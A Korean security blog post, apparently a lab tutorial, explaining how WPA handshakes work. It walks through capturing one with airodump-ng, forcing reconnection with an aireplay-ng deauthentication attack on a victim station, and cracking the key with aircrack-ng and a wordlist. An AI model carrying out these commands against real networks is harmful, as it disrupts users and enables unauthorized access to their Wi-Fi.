본문 바로가기

Security/Network Hacking

[무선해킹] 802.11 WPA 크랙





WPA 
- WPA 는 WEP 이후에 나온 암호화 인증 방식
- Authentication 과정에서 handshake 를 하는데 이때 key가 들어간다.

WPA 크랙
- 인증 과정에 key가 들어있기 때문에 인증과정을 스니핑해서 디션어리 어택을 하면 crack 가능하다.



인증과정 수집 방법

1. User 연결하는 순간에 수집
- 하지만 그 순간에 자주 있는 것이 아니라서 수집하기 어려움

2. 이미 연결되어 있는 station 을 Dos공격으로 끊고 재연결할때 수집


Dos 공격

해커가 AP로 위장하여 DeAuthentication 패킷이나 DeAssociation 패킷을 보내서 강제로 접속을 끊어버린다.


실습

실습환경: vmware (backtrack4), 공격AP SSID (WAP MAC : 5C:D9:98:E0:F4:66)
Victim MAC : 00:22:3F:E2:E6:6C

1. USB무선 랜카드를 모니터링 모드로 변환한다.
#airmon-ng start wlan0



iwconfig 를 입력하게 되면 mon0 이라는 모니터링 모드 무선랜카드 이름이 생겼다.

2. 타겟을 정하기 위해 전체 스캔



공중에 떠다니는 패킷을 수집하게 된다.
목표대상은 WPA 이다 WPA 의 MAC 주소는 5C:D9:98:E0:F4:66 을 확인 할 수 있다.


3. 타겟을 정했으면 타겟과 통신하고 있는 Station 검색



#airodump-ng mon0 --bssid 5C:D9:98:E0:F4:66






를 입력하면 해당 bssid 를 가지고 있는 AP에 대해서 스캔을 한다.
Station 의 MAC 주소는 00:22:3F:E2:E6:6C 인 것을 확인 할 수 있다.


4. 인증 과정 패킷을 수집할 그릇을 만든다.


#airodump-ng -c [채널] --bssid [AP MAC] -w [그릇이름] [모니터링모드 랜카드이름]


다음과 같이 수집하는 것을 볼 수 있지만 접속하는 상대가 없어서 계속 기다리고 있다.


5. 시간을 단축하기 위해 Station에게 Dos공격을 한다.


#aireplay-ng -0 [반복횟수] -a [AP MAC] -c [Station MAC] [모니터링모드 랜카드이름]
-0 은 Dos어택을 나타내는 옵션이다.

여기서 반복횟수를 3이라고 했기 때문에 3번 연결을 끊게 된다.


Dos어택을 하고 수집하는 것을 다시 보면 우측 상단에 WPA handshake 라고 되있으면 수집 성공한 것이다.


6. Dictionary공격


#aircrack-ng -a [옵션] -w [디션어리 파일] [그릇이름]

디션어리 파일을 미리 구해 놓아야 한다.

그릇에 디션어리 파일을 하나씩 대입해서 키를 찾아낸다.


키 값이 출력된 것을 확인 할 수 있다.


aircrack 옵션







※PSK : 미리 대칭키를 공유하는 방식 4way handshake

'Security > Network Hacking' 카테고리의 다른 글

목록화(Enumeration)  (0) 2012.07.13
풋프린팅(Footprinting)과 스캔(Scan)  (0) 2012.07.13
[무선해킹] wep 해킹  (0) 2012.07.12
TCP Session Hijacking  (0) 2012.07.12
FTP 서버 Dos 공격  (0) 2012.07.12